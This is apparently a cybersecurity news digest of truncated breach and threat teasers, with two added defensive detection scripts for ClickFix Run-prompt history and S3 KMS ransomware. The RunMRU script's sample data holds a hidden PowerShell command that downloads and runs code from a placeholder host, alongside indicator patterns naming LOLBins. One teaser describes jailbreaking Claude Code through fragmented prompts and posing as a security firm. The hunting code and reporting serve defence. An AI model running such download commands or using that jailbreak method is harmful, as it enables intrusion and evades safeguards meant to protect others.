Real estate lender tech provider SitusAMC has confirmed it suffered a cyberattack on November 12 that exposed sensitive personal information belonging to clients of some of the nation’s biggest banks, including JPMorgan Chase. The exposed data related to residential mortgages. JPMorgan Chase, Citi, and Morgan Stanley are among the institutions notified that their client data may have been taken. In a statement, the company said: “Corporate data associated with certain of our clients’ relationships with SitusAMC, such as accounting records and legal agreements, has been impacted. Certain data relating to some of our clients’ customers may also have been impacted. The scope, nature,…
Kirsten Doyle
Researchers at Huntress are warning that a new wave of ClickFix attacks is using steganography to hide malware inside PNG images, an unusual twist on an already troubling social-engineering technique. ClickFix attacks rely on one simple move: convincing a user to open the Windows Run prompt and paste a malicious command. Because the user launches the command themselves, there is no malicious attachment or download for email and endpoint controls to catch, which lets attackers bypass many traditional defences. What Huntress has now uncovered is a far more sophisticated execution chain sitting behind that simple trick, ending in infostealers such as LummaC2 and Rhadamanthys.
Attack Stages
The campaign begins with familiar lures. Early versions mimicked generic “Human Verification” checkpoints. Newer ones, however, have gone all-in on a…
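The one artefact every ClickFix victim leaves behind is the pasted command itself, which Windows records in the Run-prompt history key (RunMRU). The following hunt is an added example, not code from Huntress or from the page: it parses a constructed `.reg` export of that key and scores each entry against a small indicator list. The URLs, commands and the indicator list are my own assumptions; real exports use the same layout (value names `a`, `b`, …, an `MRUList` ordering value, and a trailing `\1` on each command).

```python
import re

# Constructed .reg-export of the Run-prompt history key, made up for this example.
# Real exports look like this, but the commands and URLs below are invented.
SAMPLE_REG_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cba"
"a"="notepad\\1"
"b"="mshta https://verify.example.invalid/check.hta\\1"
"c"="powershell -w hidden -ep bypass -c \"iex (iwr https://cdn.example.invalid/i.png -UseBasicParsing)\" # \"I am not a robot - Verification ID: 4821\"\\1"
'''

_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')

# Each indicator is weak on its own; an entry that trips two or more is worth a look.
# The list is an assumption for this example, not Huntress's detection logic.
INDICATORS = [
    ("lolbin", re.compile(r"\b(mshta|powershell|pwsh|cmd|curl|certutil|bitsadmin|msiexec)\b", re.I)),
    ("hidden-or-bypass", re.compile(r"-(w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|nop(rofile)?)\b", re.I)),
    ("download-cradle", re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|https?://)", re.I)),
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("verification-lure", re.compile(r"#.*\b(robot|captcha|verif)", re.I)),
]


def _unescape(reg_string):
    """Undo .reg escaping: \\" -> " and \\\\ -> \\ (a backslash escapes the next character)."""
    return re.sub(r"\\(.)", r"\1", reg_string)


def parse_runmru(reg_text):
    """Return the Run-prompt history, most recent first, with the trailing '\\1' stripped."""
    values, order = {}, ""
    for line in reg_text.splitlines():
        m = _VALUE_RE.match(line.strip())
        if not m:
            continue
        name, data = m.group("name"), _unescape(m.group("data"))
        if name == "MRUList":
            order = data
        else:
            values[name] = data[:-2] if data.endswith("\\1") else data
    return [values[k] for k in order if k in values]


def hunt_runmru(reg_text, min_indicators=2):
    """Score each Run entry; return the suspicious ones in MRU order with the indicators they hit."""
    hits = []
    for command in parse_runmru(reg_text):
        matched = [label for label, rx in INDICATORS if rx.search(command)]
        if len(matched) >= min_indicators:
            hits.append({"command": command, "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in hunt_runmru(SAMPLE_REG_EXPORT):
        print(hit["indicators"], "->", hit["command"])
```

On a live host the input comes from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU runmru.reg`; across a fleet the same logic works on the RunMRU values collected by an EDR or a forensic triage tool. Note that the key only records what was typed into the Run box, so a victim who pastes into a terminal or a PowerShell window instead leaves no trace here.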
Salesforce says it has picked up unusual behaviour linked to Gainsight-published apps that customers deploy and manage in their own environments. The company’s investigation shows that this activity may have allowed unauthorized access to some customers’ Salesforce data through the app’s integration path. As soon as it detected the issue, Salesforce revoked every active access and refresh token tied to Gainsight apps and pulled those apps from the AppExchange while it continues the investigation. There’s no indication that the Salesforce platform itself was compromised. The activity points to the app’s external connection rather than a platform vulnerability. Salesforce has notified…
Trend Micro researchers are warning that attackers are exploiting the weakest points in S3 environments: misconfigurations, leaked access keys, and relaxed encryption controls. Their latest analysis tracks five emerging ransomware variants built specifically to break, lock, or wipe cloud storage. The playbook differs from traditional ransomware. Rather than dropping malware and encrypting files on a machine, attackers weaponize AWS’s own features. Several variants use the Key Management Service (KMS) or Server-Side Encryption to re-encrypt S3 objects at scale. One strain encrypts bucket data with an AWS KMS key and then schedules that key for deletion, leaving victims with…
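Because these variants call legitimate AWS APIs rather than dropping malware, the place to catch them is CloudTrail. The following detection is an added example, not Trend Micro's code or the page's: it replays constructed CloudTrail-style records and flags the sequence the paragraph describes (a bucket's default encryption switched to a KMS key, a burst of SSE-KMS re-encryption copies, then `ScheduleKeyDeletion` on the same key). The account id, bucket, key ARN and principal names are invented, and the record shapes are trimmed to the fields the rules read.

```python
from collections import Counter

KEY = "arn:aws:kms:us-east-1:111122223333:key/2f3e-made-up"  # invented key ARN
ACTOR = "arn:aws:iam::111122223333:user/ci-deploy"          # invented principal

# Constructed CloudTrail-style records for this example (not real logs).
SAMPLE_CLOUDTRAIL = [
    {"eventTime": "2025-11-20T09:01:12Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/app-reader"},
     "requestParameters": {"bucketName": "acme-loan-files", "key": "2025/loan-4471.pdf"}},
    {"eventTime": "2025-11-20T09:04:30Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketEncryption",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"bucketName": "acme-loan-files",
                           "ServerSideEncryptionConfiguration": {"Rule": {"ApplyServerSideEncryptionByDefault": {
                               "SSEAlgorithm": "aws:kms", "KMSMasterKeyID": KEY}}}}},
    # 25 object re-encryptions in quick succession, all with the attacker's key.
    *[{"eventTime": f"2025-11-20T09:05:{i:02d}Z", "eventSource": "s3.amazonaws.com", "eventName": "CopyObject",
       "userIdentity": {"arn": ACTOR},
       "requestParameters": {"bucketName": "acme-loan-files", "key": f"2025/loan-{4400 + i}.pdf",
                             "x-amz-server-side-encryption": "aws:kms",
                             "x-amz-server-side-encryption-aws-kms-key-id": KEY}}
      for i in range(25)],
    {"eventTime": "2025-11-20T09:09:45Z", "eventSource": "kms.amazonaws.com", "eventName": "ScheduleKeyDeletion",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"keyId": KEY, "pendingWindowInDays": 7}},
]


def _kms_key(params):
    """Pull the KMS key reference out of the parameter shapes used above."""
    try:
        return params["ServerSideEncryptionConfiguration"]["Rule"]["ApplyServerSideEncryptionByDefault"]["KMSMasterKeyID"]
    except (KeyError, TypeError):
        return params.get("keyId") or params.get("x-amz-server-side-encryption-aws-kms-key-id")


def hunt_s3_ransomware(records, copy_burst=20):
    """Return (severity, eventName, detail) alerts, escalating when a key that buckets depend on is scheduled for deletion."""
    alerts = []
    key_to_buckets = {}  # KMS key -> buckets whose default encryption or re-encrypted objects use it
    copies = Counter()   # (principal, bucket, key) -> SSE-KMS CopyObject count
    for ev in sorted(records, key=lambda e: e["eventTime"]):
        name, params = ev["eventName"], ev.get("requestParameters", {})
        who, bucket = ev["userIdentity"]["arn"], params.get("bucketName")
        if name == "PutBucketEncryption":
            key = _kms_key(params)
            key_to_buckets.setdefault(key, set()).add(bucket)
            alerts.append(("medium", name, f"{who} set default SSE-KMS key {key} on {bucket}"))
        elif name == "DeleteBucketEncryption":
            alerts.append(("high", name, f"{who} removed default encryption from {bucket}"))
        elif name == "CopyObject" and params.get("x-amz-server-side-encryption") == "aws:kms":
            key = _kms_key(params)
            key_to_buckets.setdefault(key, set()).add(bucket)
            copies[(who, bucket, key)] += 1
            if copies[(who, bucket, key)] == copy_burst:  # alert once, when the burst threshold is crossed
                alerts.append(("medium", name, f"{who} re-encrypted >= {copy_burst} objects in {bucket} with {key}"))
        elif name == "ScheduleKeyDeletion":
            key, days = params.get("keyId"), params.get("pendingWindowInDays")
            touched = sorted(key_to_buckets.get(key, ()))
            severity = "critical" if touched else "high"
            alerts.append((severity, name,
                           f"{who} scheduled {key} for deletion in {days} days; buckets depending on it: {touched or 'none seen'}"))
    return alerts


if __name__ == "__main__":
    for severity, event, detail in hunt_s3_ransomware(SAMPLE_CLOUDTRAIL):
        print(f"[{severity}] {event}: {detail}")
```

Two caveats for running this against real trails: `CopyObject` and other object-level calls only appear if S3 data events are enabled for the bucket, and the seven-day minimum on `pendingWindowInDays` is the defender's window, so the `ScheduleKeyDeletion` alert should page someone who can run `CancelKeyDeletion` before it expires.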
A cluster of major websites (including X and ChatGPT) went down for large parts of Tuesday after Cloudflare, the backbone beneath much of the modern web, tripped over its own wiring. Shortly after 11:30 GMT, reports began to stack up on Downdetector. Thousands of users. Dozens of services. A quiet drumbeat turning into a roar. Pages froze. Apps hung. Routine clicks suddenly felt like walking through mud. Cloudflare later admitted the fault was theirs. A configuration file meant to sift hostile traffic misbehaved, triggering a crash in the software that keeps its wider network flowing. In the company’s words, it was…
Logitech has confirmed it suffered a data-theft breach tied to a zero-day in a third-party platform, days after the Clop extortion gang published almost 1.8 terabytes of data allegedly stolen from the company. In a Form 8-K filed with the U.S. Securities and Exchange Commission, the consumer-electronics maker said it “recently experienced a cybersecurity incident relating to the exfiltration of data,” adding that the attack did not impact products, business operations, or manufacturing. Logitech says the stolen data “likely included limited information about employees and consumers and data relating to customers and suppliers,” and that it does not believe national ID numbers or payment…
A new wave of phishing attacks is exploiting Microsoft Entra’s guest user invitation system, turning a legitimate collaboration tool into a weapon for social engineering and credential theft, Cyber Security News reports. Dubbed a TOAD (Telephone Oriented Attack Delivery) campaign, the attacks combine cloud-based account management with traditional phone scams, a notable evolution in hybrid cybercrime tactics. Security researcher Michael Taggart uncovered the campaign after spotting multiple phishing operations abusing Entra’s guest invitation process. He said malefactors are weaponizing a trusted Microsoft service to bypass email security filters, combining cloud infrastructure abuse with classic phone scams, which makes detection extremely difficult. The invitation email is generated and sent by Microsoft’s own infrastructure, so it passes sender-authentication checks and arrives from a domain most filters trust. The campaign relies on Microsoft’s…
A Chinese state-sponsored group is believed to be behind what researchers say is the first documented cyber-espionage operation executed largely by AI rather than humans. The campaign, detected in mid-September, used Anthropic’s Claude Code tool to probe and infiltrate around thirty organisations across tech, finance, chemicals, and government. According to Anthropic, the attackers leaned heavily on the AI’s “agentic” features, using the model not as an assistant but as the primary operator of the campaign. The group broke Claude’s guardrails by feeding it fragmented, context-free prompts and posing as a legitimate cybersecurity firm conducting defensive testing. Once jailbroken, the model performed reconnaissance, identified high-value data, wrote…
Notorious ransomware gang Clop is back with another bold claim, this time insisting it hacked “the NHS,” The Register reports. Which part of the sprawling UK healthcare system? The gang doesn’t say. It listed only the NHS.uk domain on its leak site on November 11 and published no data. For a system made up of hundreds of trusts, agencies, and regional bodies, that’s not much to go on. The extortion crew has spent recent months exploiting an Oracle E-Business Suite zero-day to hit private organizations. Adding “the NHS” to its victim roster sounds dramatic, but the lack of specifics raises a simple question: Does Clop…
Authorities have delivered another major hit to global cybercrime infrastructure, with more than 1,025 servers linked to three prolific malware operations taken down in the latest phase of Operation Endgame. Coordinated from Europol’s headquarters in The Hague between 10 and 13 November, the action targeted the infostealer Rhadamanthys, the remote access trojan VenomRAT, and the botnet Elysium. All three are key enablers of large-scale international cyberattacks. A suspect tied to VenomRAT was arrested earlier this month in Greece.
Millions of Stolen Credentials
Officials say the dismantled infrastructure had infected hundreds of thousands of machines worldwide and had siphoned millions of stolen credentials. Investigators believe the main…
